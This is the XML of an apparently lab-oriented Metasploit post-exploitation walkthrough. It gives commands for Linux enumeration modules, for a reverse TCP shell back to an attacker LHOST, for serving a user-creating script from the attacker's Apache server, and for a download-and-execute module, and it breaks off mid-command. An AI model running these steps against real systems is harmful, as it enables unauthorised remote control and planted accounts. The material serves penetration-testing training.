          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="100BD297" wp14:editId="40E97502">
            <wp:extent cx="5905804" cy="4369025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1863128842" name="Picture 43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128842" name="Picture 43" descr="A computer screen shot of a black screen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804" cy="436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5DC96" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Module 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>enum_protections</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="735C64E5" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Link:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> https://www.rapid7.com/db/modules/post/linux/gather/enum_protections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A978F84" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63698B33" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>use post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>enum_protections</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="630E11F8" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD44D42" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A4A19C" w14:textId="5F05D5BF" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="006B0C35" w:rsidP="000C4275">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DE5DA86" wp14:editId="48884726">
            <wp:extent cx="5772447" cy="3143412"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="206896784" name="Picture 4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96784" name="Picture 44" descr="A screenshot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447" cy="3143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8C632" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Module 5:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>enum_system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="693854E9" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Link:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> https://www.rapid7.com/db/modules/post/linux/gather/enum_system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311E6C73" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773350A4" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>use post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>enum_system</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="06A98DC1" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AFE76D" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444E10EC" w14:textId="6A8329FC" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="006B0C35" w:rsidP="000C4275">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44EEA8D3" wp14:editId="3C38D78E">
            <wp:extent cx="5778797" cy="4318222"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="714421994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421994" name="Picture 71442199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8797" cy="4318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BFCCA" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Module 6:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>checkcontainer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="554D76B2" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Link:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> https://www.rapid7.com/db/modules/post/linux/gather/checkcontainer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CF760B" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF03347" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>use post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>checkcontainer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="75EBF5DE" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784445FF" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3E4DAE" w14:textId="12A9D1F4" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="006B0C35" w:rsidP="000C4275">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17E83504" wp14:editId="6C133960">
            <wp:extent cx="5410478" cy="908097"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1887955696" name="Picture 46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955696" name="Picture 46" descr="A screenshot of a computer program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478" cy="908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70AC3" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Module 7:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>checkvm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45A4D31A" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Link:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> https://www.rapid7.com/db/modules/post/linux/gather/checkvm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F435460" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3508CF1A" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:lastRenderedPageBreak/>
        <w:t>use post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>checkvm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2DFDE553" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00536292" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F91E1C" w14:textId="655C798F" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="006B0C35" w:rsidP="000C4275">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27B04974" wp14:editId="4A80A821">
            <wp:extent cx="5321573" cy="1390721"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="529819170" name="Picture 47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819170" name="Picture 47" descr="A screenshot of a computer program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1573" cy="1390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4CBF4" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Module 8:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>enum_users_history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2410FED4" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Link:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> https://www.rapid7.com/db/modules/post/linux/gather/enum_users_history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0CD6FA" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769FF734" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>use post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>/gather/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>enum_users_history</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="71DB838B" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D525CDE" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC15D62" w14:textId="2B0B9AA3" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="006B0C35" w:rsidP="000C4275">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="773820ED" wp14:editId="5670AC50">
            <wp:extent cx="5912154" cy="1873346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="154100503" name="Picture 48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00503" name="Picture 48" descr="A computer screen shot of a program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2154" cy="187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83CF0" w14:textId="77777777" w:rsidR="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Module 9:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> post/multi/manage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>system_session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="335E3B16" w14:textId="76E31935" w:rsidR="006B0C35" w:rsidRDefault="006B0C35" w:rsidP="000C4275">
      <w:r>
        <w:t>A M</w:t>
      </w:r>
      <w:r w:rsidRPr="006B0C35">
        <w:t>etasploit post module that spawns a reverse TCP shell from a Linux/Unix host using available interpreters (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B0C35">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B0C35">
        <w:t>/python/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B0C35">
        <w:t>perl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B0C35">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1121DB63" w14:textId="205D38F1" w:rsidR="006B0C35" w:rsidRPr="000C4275" w:rsidRDefault="006B0C35" w:rsidP="000C4275">
      <w:r w:rsidRPr="006B0C35">
        <w:t>It returns an interactive session to your handler so you can run commands on the compromised machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B68FD8" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Link:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> https://www.rapid7.com/db/modules/post/multi/manage/system_session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B8FDFA" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F4359C" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>use post/multi/manage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>system_session</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1EB9A10D" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>set SESSION 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52644178" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>set TYPE python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3078F3" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>set HANDLER true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9CF2BF" w14:textId="00A99E83" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t xml:space="preserve">set LHOST </w:t>
      </w:r>
      <w:r w:rsidR="00B71516" w:rsidRPr="00B71516">
        <w:t>192.24.81.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49195597" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF55147" w14:textId="733624FE" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="00B71516" w:rsidP="000C4275">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F361D21" wp14:editId="12599954">
            <wp:extent cx="5886753" cy="3968954"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="183451808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51808" name="Picture 18345180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6753" cy="3968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BFF50" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>Now, let’s create a bash file which will create a user on the target machine by uploading a test.sh file and execute it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BE76E8" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E469C3" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>useradd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t xml:space="preserve"> hacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBA429E" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>useradd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t xml:space="preserve"> test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379A8D01" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>useradd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t xml:space="preserve"> nick</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F201E87" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:lastRenderedPageBreak/>
        <w:t>Now, let’s run the Apache server on the attacker’s machine and copy the test.sh file in the root folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3FFF9A" w14:textId="798E1A13" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31132400" wp14:editId="1E4DEC82">
            <wp:extent cx="5943600" cy="1418590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="861529541" name="Picture 22" descr="Conten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 descr="Content Image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1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D99A1" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3B716E" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>init.d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>/apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097B6ECB" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>cp test.sh /var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F560F73" w14:textId="0F94D549" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="00B71516" w:rsidP="000C4275">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BC70BE3" wp14:editId="2A56CA08">
            <wp:extent cx="5740695" cy="2044805"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1164025951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025951" name="Picture 116402595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0695" cy="204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BA757" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>Now, let’s use the download and exec post-exploitation module on the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056F720D" w14:textId="77777777" w:rsidR="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Module 10:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> post/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>/manage/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000C4275">
        <w:t>download_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6AE4FADD" w14:textId="25CB73AD" w:rsidR="00116991" w:rsidRPr="000C4275" w:rsidRDefault="00116991" w:rsidP="000C4275">
      <w:r w:rsidRPr="00116991">
        <w:t xml:space="preserve">Metasploit helper (post/payload module) that </w:t>
      </w:r>
      <w:r w:rsidRPr="00116991">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>downloads a file from a URL to the target and executes it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F770E1A" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Link:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4275">
        <w:t> https://www.rapid7.com/db/modules/post/linux/manage/download_exec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3564C9D2" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769F56FA" w14:textId="77777777" w:rsidR="000C4275" w:rsidRPr="000C4275" w:rsidRDefault="000C4275" w:rsidP="000C4275">
      <w:r w:rsidRPr="000C4275">
        <w:t>use post/</w:t>
      </w:r>
